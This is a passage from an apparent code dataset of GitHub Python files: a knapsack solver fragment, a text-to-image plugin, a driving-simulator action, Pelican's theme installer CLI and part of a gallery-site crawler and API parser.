indexes = [i for i in range(len(element)) if element[i] == 1]\r\n return indexes\r\n \r\n\r\n\r\n def solve_knapsack_pw_ratio(self):\r\n ratios = []\r\n for p, w, i in zip(self.profits, \r\n self.weights, \r\n range(len(self.weights))\r\n ):\r\n ratios.append( (p/w, i) )\r\n ratios.sort(reverse = True)\r\n\r\n sum = 0\r\n i = 0\r\n indexes = []\r\n\r\n while(sum + self.weights[ratios[i][1]] <= self.capacity):\r\n index = ratios[i][1]\r\n sum += self.weights[index]\r\n indexes.append(index)\r\n i += 1\r\n return indexes\r\n\r\n def format(self, indexes):\r\n indexes.sort()\r\n print([el for el in indexes])\r\n","repo_name":"ewaMiazga/iai-2022","sub_path":"Knapsack Problem/KnapSack.py","file_name":"KnapSack.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32639893227","text":"from base64 import b64encode\nfrom io import BytesIO\nfrom pathlib import Path\nfrom typing import Optional, Union\n\nfrom PIL import Image, ImageDraw, ImageFont\n\nfrom .config import FONT_FILE, templates\n\n\nclass Txt2Img:\n \"\"\"Convert text to image\"\"\"\n\n font_family: str\n title_font_size: int\n text_font_size: int\n title_line_space: int\n text_line_space: int\n text_max_width: int\n fix_width: bool\n text_color: tuple\n title_color: tuple\n bg_color: tuple\n\n def __init__(self):\n self.font_family = str(FONT_FILE)\n self.title_font_size = 45\n self.text_font_size = 30\n self.title_line_space = 30\n self.text_line_space = 15\n self.text_max_width = 1080\n self.fix_width = False\n self.text_color = (0, 0, 0, 255)\n self.title_color = (0, 0, 0, 255)\n self.bg_color = (255, 255, 255, 0)\n\n def set_font_family(self, font_family: str):\n \"\"\"设置字体\"\"\"\n self.font_family = font_family\n\n def set_font_size(self, font_size: int, title_font_size: Optional[int] = None):\n \"\"\"设置字体大小\"\"\"\n self.text_font_size = font_size\n self.text_line_space = font_size // 2\n if title_font_size is not None:\n self.title_font_size = title_font_size\n else:\n self.title_font_size = int(font_size * 1.5)\n self.title_line_space = font_size\n\n def set_font_color(self, text_color: tuple, title_color: Optional[tuple] = None):\n \"\"\"设置字体颜色\"\"\"\n self.text_color = text_color\n if title_color is not None:\n self.title_color = title_color\n else:\n self.title_color = text_color\n\n def set_width(self, width: int):\n \"\"\"设置图片宽度\"\"\"\n self.text_max_width = width\n self.fix_width = True\n\n def word_wrap(self, text: str, font: ImageFont.FreeTypeFont) -> str:\n \"\"\"自动换行\"\"\"\n temp_len = 0\n result = \"\"\n for ch in text:\n char_w = font.getsize(ch)[0]\n if ch == \"\\n\":\n result += ch\n temp_len = 0\n elif char_w > 0:\n result += ch\n temp_len += char_w\n if temp_len > self.text_max_width - self.text_font_size:\n temp_len = 0\n result += \"\\n\"\n result = result.rstrip()\n return result\n\n def draw_img(\n self, title: str, text: str, template: Union[str, dict] = \"mi\"\n ) -> Image.Image:\n \"\"\"绘制给定模板下的图片\"\"\"\n\n if isinstance(template, str):\n try:\n template = templates[template] # type: ignore\n except KeyError:\n template = templates[\"mi\"] # type: ignore\n\n try:\n font_family = template[\"font\"] # type: ignore\n text_color = template[\"text\"][\"color\"] # type: ignore\n title_color = template[\"title\"][\"color\"] # type: ignore\n margin = int(template[\"margin\"]) # type: ignore\n background = template[\"background\"] # type: ignore\n except KeyError:\n raise ValueError(\"Invalid template\")\n\n if not Path(font_family).exists():\n raise ValueError(\"Invalid font\")\n\n self.set_font_family(font_family)\n self.set_font_color(text_color, title_color) # type: ignore\n text_img = self.draw_text(title, text)\n\n try:\n if background[\"type\"] == \"image\": # type: ignore\n out_img = Image.new(\n \"RGBA\",\n (text_img.width + 2 * margin, text_img.height + 2 * margin),\n (0, 0, 0, 0),\n )\n bg_img = Image.open(background[\"image\"]) # type: ignore\n out_img = tile_image(bg_img, out_img)\n elif background[\"type\"] == \"color\": # type: ignore\n out_img = Image.new(\"RGBA\", (text_img.width + 2 * margin, text_img.height + 2 * margin), background[\"color\"]) # type: ignore\n else:\n raise ValueError(\"Invalid background type\")\n except Exception:\n raise ValueError(\"Invalid template\")\n\n out_img.paste(text_img, (margin, margin), text_img)\n\n try:\n border = template[\"border\"] # type: ignore\n border_color = border[\"color\"] # type: ignore\n border_width = int(border[\"width\"]) # type: ignore\n border_margin = int(border[\"margin\"]) # type: ignore\n draw = ImageDraw.Draw(out_img)\n draw.rectangle(\n (\n border_margin,\n border_margin,\n out_img.width - border_margin,\n out_img.height - border_margin,\n ),\n outline=border_color,\n width=border_width,\n )\n except KeyError:\n pass\n except Exception:\n raise ValueError(\"Invalid template\")\n\n return out_img\n\n def draw(self, title: str, text: str, template: Union[str, dict] = \"mi\") -> str:\n \"\"\"绘制给定模板下指定标题与正文的图片并转换为base64\"\"\"\n out_img = self.draw_img(title, text, template)\n return img2b64(out_img)\n\n def draw_text(self, title: str, text: str) -> Image.Image:\n \"\"\"绘制标题与正文的图片\"\"\"\n title_font = ImageFont.truetype(self.font_family, self.title_font_size)\n text_font = ImageFont.truetype(self.font_family, self.text_font_size)\n\n if title == \" \":\n title = \"\"\n\n if len(title.split(\"\\n\")) > 1:\n title = title.split(\"\\n\")[0]\n\n text = self.word_wrap(text, text_font)\n\n lines = text.split(\"\\n\")\n text_rows = len(lines)\n\n title_width = title_font.getsize(title)[0]\n\n if not self.fix_width:\n line_max_width = max([text_font.getsize(line)[0] for line in lines])\n text_total_width = max(line_max_width, title_width)\n else:\n text_total_width = self.text_max_width\n\n if title:\n text_total_height = (\n self.title_font_size\n + self.title_line_space\n + self.text_font_size * text_rows\n + (text_rows - 1) * (self.text_line_space)\n )\n else:\n text_total_height = self.text_font_size * text_rows + (text_rows - 1) * (\n self.text_line_space\n )\n\n out_img = Image.new(\n mode=\"RGBA\", size=(text_total_width, text_total_height), color=self.bg_color\n )\n draw = ImageDraw.Draw(out_img)\n\n if title:\n draw.text(\n ((text_total_width - title_width) // 2, 0),\n title,\n font=title_font,\n fill=self.text_color,\n spacing=self.title_line_space,\n )\n draw.text(\n (\n 0,\n self.title_font_size + self.title_line_space,\n ),\n text,\n font=text_font,\n fill=self.text_color,\n spacing=self.text_line_space,\n )\n else:\n draw.text(\n (0, 0),\n text,\n font=text_font,\n fill=self.text_color,\n spacing=self.text_line_space,\n )\n\n return out_img\n\n\ndef tile_image(small_image: Image.Image, big_image: Image.Image) -> Image.Image:\n \"\"\"将小图片平铺到大图片上\"\"\"\n w, h = small_image.size\n\n for i in range(0, big_image.size[0], w):\n for j in range(0, big_image.size[1], h):\n big_image.paste(small_image, (i, j))\n\n return big_image\n\n\ndef img2b64(img) -> str:\n \"\"\"图片转 base64\"\"\"\n buf = BytesIO()\n img.save(buf, format=\"PNG\")\n base64_str = \"base64://\" + b64encode(buf.getvalue()).decode()\n return base64_str\n","repo_name":"mobyw/nonebot-plugin-txt2img","sub_path":"nonebot_plugin_txt2img/txt2img.py","file_name":"txt2img.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"20161298115","text":"import numpy as np\nfrom driving_sim.actions.action import Action\n\nclass TrajectoryAccelAction(Action):\n def __init__(self,a_s,a_t,trajectory):\n self.a_s = a_s\n self.a_t = a_t # is always 0 for now!\n self.trajectory = trajectory\n\n def update(self,car,dt):\n s, t, theta, curv = self.trajectory.xy_to_traj(car.position)\n\n v_x, v_y = car.velocity[0], car.velocity[1]\n # rotate the total velocity for theta degrees\n v_s = v_x*np.cos(theta) + v_y*np.sin(theta)\n v_t = -v_x*np.sin(theta) + v_y*np.cos(theta)\n phi = np.arctan2(v_t, v_s)\n\n v_s_new = v_s + self.a_s*dt\n v_t_new = v_t + self.a_t*dt\n velocity_new = car.set_velocity(np.array([v_s_new, v_t_new]))\n v_s_new, v_t_new = velocity_new[0], velocity_new[1]\n s_new = s + 0.5*(v_s+v_s_new)*dt\n t_new = t + 0.5*(v_t+v_t_new)*dt\n\n x_new, y_new, theta_new, curv_new = self.trajectory.traj_to_xy(np.array([s_new, t_new]))\n # rotate the velocity back\n v_x_new = v_s_new*np.cos(theta_new) - v_t_new*np.sin(theta_new)\n v_y_new = v_s_new*np.sin(theta_new) + v_t_new*np.cos(theta_new)\n\n car.set_position(np.array([x_new,y_new]))\n # print('velocity:', v_x_new, v_y_new)\n car.set_velocity(np.array([v_x_new, v_y_new]))\n phi_new = np.arctan2(v_t_new, v_s_new)\n\n max_ang = car._max_rotation #np.pi/18.\n if phi_new > max_ang:\n car.set_rotation(theta_new+max_ang)\n elif phi_new < -max_ang:\n car.set_rotation(theta_new-max_ang)\n else:\n car.set_rotation(theta_new+phi_new)\n","repo_name":"Shuijing725/VAE_trait_inference","sub_path":"driving_sim/actions/trajectory_accel_action.py","file_name":"trajectory_accel_action.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"36456538020","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport shutil\nimport sys\n\n\ndef err(msg, die=None):\n \"\"\"Print an error message and exits if an exit code is given\"\"\"\n sys.stderr.write(msg + \"\\n\")\n if die:\n sys.exit(die if isinstance(die, int) else 1)\n\n\ntry:\n import pelican\nexcept ImportError:\n err(\n \"Cannot import pelican.\\nYou must \"\n \"install Pelican in order to run this script.\",\n -1,\n )\n\n\nglobal _THEMES_PATH\n_THEMES_PATH = os.path.join(\n os.path.dirname(os.path.abspath(pelican.__file__)), \"themes\"\n)\n\n__version__ = \"0.2\"\n_BUILTIN_THEMES = [\"simple\", \"notmyidea\"]\n\n\ndef main():\n \"\"\"Main function\"\"\"\n\n parser = argparse.ArgumentParser(description=\"\"\"Install themes for Pelican\"\"\")\n\n excl = parser.add_mutually_exclusive_group()\n excl.add_argument(\n \"-l\",\n \"--list\",\n dest=\"action\",\n action=\"store_const\",\n const=\"list\",\n help=\"Show the themes already installed and exit\",\n )\n excl.add_argument(\n \"-p\",\n \"--path\",\n dest=\"action\",\n action=\"store_const\",\n const=\"path\",\n help=\"Show the themes path and exit\",\n )\n excl.add_argument(\n \"-V\",\n \"--version\",\n action=\"version\",\n version=f\"pelican-themes v{__version__}\",\n help=\"Print the version of this script\",\n )\n\n parser.add_argument(\n \"-i\",\n \"--install\",\n dest=\"to_install\",\n nargs=\"+\",\n metavar=\"theme path\",\n help=\"The themes to install\",\n )\n parser.add_argument(\n \"-r\",\n \"--remove\",\n dest=\"to_remove\",\n nargs=\"+\",\n metavar=\"theme name\",\n help=\"The themes to remove\",\n )\n parser.add_argument(\n \"-U\",\n \"--upgrade\",\n dest=\"to_upgrade\",\n nargs=\"+\",\n metavar=\"theme path\",\n help=\"The themes to upgrade\",\n )\n parser.add_argument(\n \"-s\",\n \"--symlink\",\n dest=\"to_symlink\",\n nargs=\"+\",\n metavar=\"theme path\",\n help=\"Same as `--install', but create a symbolic link instead of \"\n \"copying the theme. Useful for theme development\",\n )\n parser.add_argument(\n \"-c\",\n \"--clean\",\n dest=\"clean\",\n action=\"store_true\",\n help=\"Remove the broken symbolic links of the theme path\",\n )\n\n parser.add_argument(\n \"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\", help=\"Verbose output\"\n )\n\n args = parser.parse_args()\n\n to_install = args.to_install or args.to_upgrade\n to_sym = args.to_symlink or args.clean\n\n if args.action:\n if args.action == \"list\":\n list_themes(args.verbose)\n elif args.action == \"path\":\n print(_THEMES_PATH)\n elif to_install or args.to_remove or to_sym:\n if args.to_remove:\n if args.verbose:\n print(\"Removing themes...\")\n\n for i in args.to_remove:\n remove(i, v=args.verbose)\n\n if args.to_install:\n if args.verbose:\n print(\"Installing themes...\")\n\n for i in args.to_install:\n install(i, v=args.verbose)\n\n if args.to_upgrade:\n if args.verbose:\n print(\"Upgrading themes...\")\n\n for i in args.to_upgrade:\n install(i, v=args.verbose, u=True)\n\n if args.to_symlink:\n if args.verbose:\n print(\"Linking themes...\")\n\n for i in args.to_symlink:\n symlink(i, v=args.verbose)\n\n if args.clean:\n if args.verbose:\n print(\"Cleaning the themes directory...\")\n\n clean(v=args.verbose)\n else:\n print(\"No argument given... exiting.\")\n\n\ndef themes():\n \"\"\"Returns the list of the themes\"\"\"\n for i in os.listdir(_THEMES_PATH):\n e = os.path.join(_THEMES_PATH, i)\n\n if os.path.isdir(e):\n if os.path.islink(e):\n yield (e, os.readlink(e))\n else:\n yield (e, None)\n\n\ndef list_themes(v=False):\n \"\"\"Display the list of the themes\"\"\"\n for theme_path, link_target in themes():\n if not v:\n theme_path = os.path.basename(theme_path)\n if link_target:\n if v:\n print(theme_path + (\" (symbolic link to `\" + link_target + \"')\"))\n else:\n print(theme_path + \"@\")\n else:\n print(theme_path)\n\n\ndef remove(theme_name, v=False):\n \"\"\"Removes a theme\"\"\"\n\n theme_name = theme_name.replace(\"/\", \"\")\n target = os.path.join(_THEMES_PATH, theme_name)\n\n if theme_name in _BUILTIN_THEMES:\n err(\n theme_name + \" is a builtin theme.\\n\"\n \"You cannot remove a builtin theme with this script, \"\n \"remove it by hand if you want.\"\n )\n elif os.path.islink(target):\n if v:\n print(\"Removing link `\" + target + \"'\")\n os.remove(target)\n elif os.path.isdir(target):\n if v:\n print(\"Removing directory `\" + target + \"'\")\n shutil.rmtree(target)\n elif os.path.exists(target):\n err(target + \" : not a valid theme\")\n else:\n err(target + \" : no such file or directory\")\n\n\ndef install(path, v=False, u=False):\n \"\"\"Installs a theme\"\"\"\n if not os.path.exists(path):\n err(path + \" : no such file or directory\")\n elif not os.path.isdir(path):\n err(path + \" : not a directory\")\n else:\n theme_name = os.path.basename(os.path.normpath(path))\n theme_path = os.path.join(_THEMES_PATH, theme_name)\n exists = os.path.exists(theme_path)\n if exists and not u:\n err(path + \" : already exists\")\n elif exists:\n remove(theme_name, v)\n install(path, v)\n else:\n if v:\n print(f\"Copying '{path}' to '{theme_path}' ...\")\n try:\n shutil.copytree(path, theme_path)\n\n try:\n if os.name == \"posix\":\n for root, dirs, files in os.walk(theme_path):\n for d in dirs:\n dname = os.path.join(root, d)\n os.chmod(dname, 493) # 0o755\n for f in files:\n fname = os.path.join(root, f)\n os.chmod(fname, 420) # 0o644\n except OSError as e:\n err(\n \"Cannot change permissions of files \"\n \"or directory in `{r}':\\n{e}\".format(r=theme_path, e=str(e)),\n die=False,\n )\n except Exception as e:\n err(\n \"Cannot copy `{p}' to `{t}':\\n{e}\".format(\n p=path, t=theme_path, e=str(e)\n )\n )\n\n\ndef symlink(path, v=False):\n \"\"\"Symbolically link a theme\"\"\"\n if not os.path.exists(path):\n err(path + \" : no such file or directory\")\n elif not os.path.isdir(path):\n err(path + \" : not a directory\")\n else:\n theme_name = os.path.basename(os.path.normpath(path))\n theme_path = os.path.join(_THEMES_PATH, theme_name)\n if os.path.exists(theme_path):\n err(path + \" : already exists\")\n else:\n if v:\n print(f\"Linking `{path}' to `{theme_path}' ...\")\n try:\n os.symlink(path, theme_path)\n except Exception as e:\n err(\n \"Cannot link `{p}' to `{t}':\\n{e}\".format(\n p=path, t=theme_path, e=str(e)\n )\n )\n\n\ndef is_broken_link(path):\n \"\"\"Returns True if the path given as is a broken symlink\"\"\"\n path = os.readlink(path)\n return not os.path.exists(path)\n\n\ndef clean(v=False):\n \"\"\"Removes the broken symbolic links\"\"\"\n c = 0\n for path in os.listdir(_THEMES_PATH):\n path = os.path.join(_THEMES_PATH, path)\n if os.path.islink(path) and is_broken_link(path):\n if v:\n print(f\"Removing {path}\")\n try:\n os.remove(path)\n except OSError:\n print(f\"Error: cannot remove {path}\")\n else:\n c += 1\n\n print(f\"\\nRemoved {c} broken links\")\n","repo_name":"getpelican/pelican","sub_path":"pelican/tools/pelican_themes.py","file_name":"pelican_themes.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":11876,"dataset":"github-code","pt":"37"} +{"seq_id":"17396575299","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport re\nimport time\nimport typing\nimport urllib.parse\nfrom collections import defaultdict\nfrom collections.abc import Iterable\nfrom typing import Optional\n\nimport feedparser\nfrom bs4 import BeautifulSoup\nfrom django.db.models import QuerySet\n\nfrom core.base.parsers import BaseParser\nfrom core.base.utilities import (\n chunks, request_with_retries, construct_request_dict, request_by_provider)\nfrom core.base.types import GalleryData, DataDict\nfrom viewer.models import Gallery\nfrom .utilities import link_from_gid_token_fjord, map_external_gallery_data_to_internal, \\\n get_gid_token_from_link, root_gid_token_from_link, SearchHTMLParser\nfrom . import constants\nfrom . import utilities\n\nif typing.TYPE_CHECKING:\n from viewer.models import WantedGallery\n from core.base.setup import Settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass Parser(BaseParser):\n name = constants.provider_name\n accepted_urls = [constants.ex_page_short, constants.ge_page_short, constants.rss_url]\n\n def __init__(self, settings: 'Settings'):\n\n super().__init__(settings)\n\n self.api_request_function = request_by_provider(\n self.name, self.own_settings.api_concurrent_limit, self.own_settings.api_wait_limit\n )\n\n # Panda only methods\n def get_galleries_from_page_links(self, page_links: Iterable[str], page_links_results: list[DataDict]) -> None:\n\n api_page_links = []\n\n for page_link in page_links:\n\n m = re.search(r'(.+)/s/(\\w+)/(\\d+)-(\\d+)', page_link)\n if not m:\n continue\n api_page_links.append(\n {'data': [m.group(3), m.group(2), m.group(4)]})\n\n api_page_links_chunks = list(chunks(api_page_links, 25))\n\n for i, group in enumerate(api_page_links_chunks):\n\n data = {\n 'method': 'gtoken',\n 'pagelist': [x['data'] for x in group]}\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n constants.ge_api_url,\n request_dict,\n post=True,\n )\n\n if not response:\n continue\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n continue\n\n for gid_token_pair in response_data['tokenlist']:\n\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery_id=gid_token_pair['gid'],\n link=link_from_gid_token_fjord(gid_token_pair['gid'], gid_token_pair['token'], False)\n )\n\n if discard_approved:\n if not self.settings.silent_processing:\n logger.info(discard_message)\n continue\n\n page_links_results.append(\n {'data': (gid_token_pair['gid'], gid_token_pair['token']),\n 'link': link_from_gid_token_fjord(gid_token_pair['gid'], gid_token_pair['token'], False)})\n\n def get_galleries_from_main_page_link(self, url: str) -> set[str]:\n\n unique_urls = set()\n\n while True:\n\n parsed = urllib.parse.urlparse(url)\n query = urllib.parse.parse_qs(parsed.query)\n if 'page' in query:\n current_page = int(query['page'][0])\n else:\n params = {'page': ['0']}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n current_page = 0\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n\n response = request_with_retries(\n url,\n request_dict,\n post=False,\n )\n\n if not response:\n logger.info(\"Got no response, stopping\")\n break\n\n response.encoding = 'utf-8'\n\n if 'No hits found' in response.text:\n logger.info(\"Empty page found, ending\")\n break\n else:\n logger.info(\n \"Got content on search page {}, looking for galleries and jumping \"\n \"to the next page. Link: {}\".format(current_page, url)\n )\n main_page_parser = SearchHTMLParser()\n main_page_parser.feed(response.text)\n logger.info(\"Number of galleries found: {}\".format(len(main_page_parser.galleries)))\n if len(main_page_parser.galleries) >= 1:\n for gallery_url in main_page_parser.galleries:\n unique_urls.add(gallery_url)\n else:\n logger.info(\"Empty page found, ending\")\n break\n if self.own_settings.stop_page_number is not None:\n if current_page >= self.own_settings.stop_page_number:\n logger.info(\n \"Got to stop page number: {}, \"\n \"ending (setting: provider.stop_page_number).\".format(self.own_settings.stop_page_number)\n )\n break\n current_page += 1\n params = {'page': [str(current_page)]}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n time.sleep(self.own_settings.wait_timer)\n\n return unique_urls\n\n def get_galleries_from_lofi_page_link(self, url: str) -> set[str]:\n\n unique_urls = set()\n\n while True:\n parsed = urllib.parse.urlparse(url)\n query = urllib.parse.parse_qs(parsed.query)\n if 'page' in query:\n current_page = int(query['page'][0])\n else:\n params = {'page': ['0']}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n current_page = 0\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n\n response = request_with_retries(\n url,\n request_dict,\n post=False,\n )\n\n if not response:\n logger.info(\"Got no response, stopping\")\n break\n\n response.encoding = 'utf-8'\n\n if 'No hits found' in response.text:\n logger.info(\"Empty page found, ending\")\n break\n else:\n logger.info(\n \"Got content on search page {}, looking for galleries and jumping \"\n \"to the next page. Link: {}\".format(current_page, url)\n )\n current_found_links = []\n soup = BeautifulSoup(response.text, 'html.parser')\n gallery_containers = soup.findAll(\"td\", class_=\"ii\")\n for gallery_container in gallery_containers:\n link_container = gallery_container.find(\"a\")\n if link_container:\n found_link = link_container.get(\"href\").replace(\"lofi/\", \"\")\n current_found_links.append(found_link)\n logger.info(\"Number of galleries found: {}\".format(len(current_found_links)))\n if len(current_found_links) >= 1:\n for gallery_url in current_found_links:\n unique_urls.add(gallery_url)\n else:\n logger.info(\"Empty page found, ending\")\n break\n if self.own_settings.stop_page_number is not None:\n if current_page >= self.own_settings.stop_page_number:\n logger.info(\n \"Got to stop page number: {}, \"\n \"ending (setting: provider.stop_page_number).\".format(self.own_settings.stop_page_number)\n )\n break\n current_page += 1\n params = {'page': [str(current_page)]}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n time.sleep(self.own_settings.wait_timer)\n\n return unique_urls\n\n def get_values_from_gallery_link_list(self, url_list: Iterable[str], use_fjord: bool = False) -> list[GalleryData]:\n\n gid_token_chunks = list(chunks([get_gid_token_from_link(link) for link in url_list], 25))\n\n galleries_data = []\n\n if self.own_settings.cookies and use_fjord:\n api_page = constants.ex_api_url\n else:\n api_page = constants.ge_api_url\n\n for i, group in enumerate(gid_token_chunks):\n\n if not self.settings.silent_processing:\n logger.info(\n \"Calling API ({}), URL: {}. \"\n \"Gallery group: {}, galleries in group: {}, total groups: {}\".format(\n self.name,\n api_page,\n i + 1,\n len(group),\n len(gid_token_chunks)\n )\n )\n\n data = utilities.request_data_from_gid_token_iterable(group)\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n api_page,\n request_dict,\n post=True,\n )\n\n if not response:\n continue\n\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n continue\n\n for gallery_data in response_data['gmetadata']:\n if 'error' in gallery_data:\n logger.error(\n \"Fetching gallery {}: \"\n \"failed with error: {}\".format(gallery_data['gid'], gallery_data['error'])\n )\n continue\n internal_gallery_data = map_external_gallery_data_to_internal(gallery_data)\n if use_fjord and internal_gallery_data.fjord:\n internal_gallery_data.root = constants.ex_page\n internal_gallery_data.link = link_from_gid_token_fjord(\n gallery_data['gid'], gallery_data['token'], True\n )\n else:\n internal_gallery_data.root = constants.ge_page\n internal_gallery_data.link = link_from_gid_token_fjord(\n gallery_data['gid'], gallery_data['token'], False\n )\n galleries_data.append(internal_gallery_data)\n\n return galleries_data\n\n def get_values_from_gallery_link(self, link: str) -> Optional[GalleryData]:\n\n link_root, gid, token = root_gid_token_from_link(link)\n\n if link_root is None or gid is None or token is None:\n return None\n\n if self.own_settings.use_ex_for_fjord and self.own_settings.cookies and link_root == constants.ex_api_url:\n api_page = constants.ex_api_url\n else:\n api_page = constants.ge_api_url\n\n data = utilities.request_data_from_gid_token_iterable([(gid, token)])\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n api_page,\n request_dict,\n post=True,\n )\n\n if not response:\n return None\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n return None\n for gallery_data in response_data['gmetadata']:\n if 'error' in gallery_data:\n logger.error(\n \"Adding gallery {}: \"\n \"failed with error: {}\".format(gallery_data['gid'], gallery_data['error'])\n )\n return None\n internal_gallery_data = map_external_gallery_data_to_internal(gallery_data)\n return internal_gallery_data\n return None\n\n def get_feed_urls(self) -> list[str]:\n return [constants.rss_url, ]\n\n def crawl_feed(self, feed_url: str = '') -> list[str]:\n\n urls: list[str] = []\n\n if not feed_url:\n feed_url = constants.rss_url\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n\n response = request_with_retries(\n feed_url,\n request_dict,\n post=False,\n )\n\n if not response:\n logger.error(\"Got no response from feed URL: {}\".format(feed_url))\n return urls\n\n response.encoding = 'utf-8'\n\n feed = feedparser.parse(\n response.text\n )\n\n for item in feed['items']:\n if self.own_settings.accepted_rss_categories:\n if any([item['title'].startswith(category) for category in self.own_settings.accepted_rss_categories]):\n urls.append(item['link'])\n else:\n urls.append(item['link'])\n return urls\n\n def fetch_gallery_data(self, url: str) -> Optional[GalleryData]:\n return self.get_values_from_gallery_link(url)\n\n def fetch_multiple_gallery_data(self, url_list: list[str]) -> list[GalleryData]:\n return self.get_values_from_gallery_link_list(url_list)\n\n @staticmethod\n def id_from_url(url: str) -> Optional[str]:\n m = re.search(r'(.+)/g/(\\d+)/(\\w+)', url)\n if m and m.group(2):\n return m.group(2)\n else:\n return None\n\n @staticmethod\n def token_from_url(url: str) -> Optional[str]:\n m = re.search(r'(.+)/g/(\\d+)/(\\w+)', url)\n if m and m.group(3):\n return m.group(3)\n else:\n return None\n\n def crawl_urls(self, urls: list[str], wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None) -> None:\n\n unique_urls = set()\n gallery_data_list = []\n fetch_format_galleries: list[DataDict] = []\n unique_page_urls = set()\n gallery_wanted_lists: dict[str, list['WantedGallery']] = preselected_wanted_matches or defaultdict(list)\n\n if not self.downloaders:\n logger.warning('No downloaders enabled, returning.')\n return\n\n for url in urls:\n\n if constants.rss_url in url:\n feed_links = self.crawl_feed(url)\n unique_urls.update(feed_links)\n logger.info(\"Provided RSS URL for provider ({}), adding {} found links\".format(\n self.name,\n len(feed_links))\n )\n continue\n\n if (constants.ex_page_short not in url\n and constants.ge_page_short not in url):\n logger.warning(\"Invalid URL, skipping: {}\".format(url))\n continue\n\n if '/g/' in url:\n if not self.settings.silent_processing:\n logger.info(\"Provided URL {} is a gallery link, adding\".format(url))\n unique_urls.add(url)\n continue\n\n if '/s/' in url:\n if not self.settings.silent_processing:\n logger.info(\"Provided URL {} is a page link, adding\".format(url))\n unique_page_urls.add(url)\n continue\n\n # Do not crawl main page links if they were submitted anonymously, to prevent spam.\n if len(self.downloaders) == 1 and self.downloaders[0][0].type == 'submit':\n continue\n\n if '/lofi/' in url:\n if not self.settings.silent_processing:\n logger.info(\"Provided URL {} is a lofi page link, adding\".format(url))\n unique_urls.update(self.get_galleries_from_lofi_page_link(url))\n continue\n\n # assuming main page URLs\n unique_urls.update(self.get_galleries_from_main_page_link(url))\n\n gallery_ids = []\n found_galleries = set()\n total_galleries_filtered = []\n for gallery_url in unique_urls:\n\n m = re.search(r'(.+)/g/(\\d+)/(\\w+)', gallery_url)\n if m:\n gallery_ids.append(m.group(2))\n total_galleries_filtered.append((gallery_url, m.group(1), m.group(2), m.group(3)))\n\n for galleries_gid_group in list(chunks(gallery_ids, 900)):\n for found_gallery in Gallery.objects.filter(gid__in=galleries_gid_group):\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery=found_gallery,\n link=found_gallery.get_link()\n )\n\n if discard_approved:\n if not self.settings.silent_processing:\n logger.info(discard_message)\n found_galleries.add(found_gallery.gid)\n\n for gallery_tuple in total_galleries_filtered:\n\n if gallery_tuple[2] not in found_galleries:\n fetch_format_galleries.append(\n {\n 'data': (gallery_tuple[2], gallery_tuple[3]),\n 'root': gallery_tuple[1],\n 'link': gallery_tuple[0]\n }\n )\n if not self.settings.silent_processing:\n logger.info(\n \"Gallery {} will be processed. \"\n \"Total galleries: {}\".format(gallery_tuple[0], len(fetch_format_galleries))\n )\n\n if len(unique_page_urls) > 0:\n logger.info(\"Getting gallery links from page links...\")\n page_links_results: list[DataDict] = []\n self.get_galleries_from_page_links(unique_page_urls, page_links_results)\n fetch_format_galleries += page_links_results\n\n if len(fetch_format_galleries) == 0:\n logger.info(\"No galleries need downloading, returning.\")\n return\n\n fetch_format_galleries_chunks = list(chunks(fetch_format_galleries, 25))\n fjord_galleries: list[str] = []\n for i, group in enumerate(fetch_format_galleries_chunks):\n if not self.settings.silent_processing:\n logger.info(\n \"Calling non-fjord API ({}). \"\n \"Gallery group: {}, galleries in group: {}, total groups: {}\".format(\n self.name,\n i + 1,\n len(group),\n len(fetch_format_galleries_chunks)\n )\n )\n\n data = utilities.request_data_from_gid_token_iterable([x['data'] for x in group])\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n 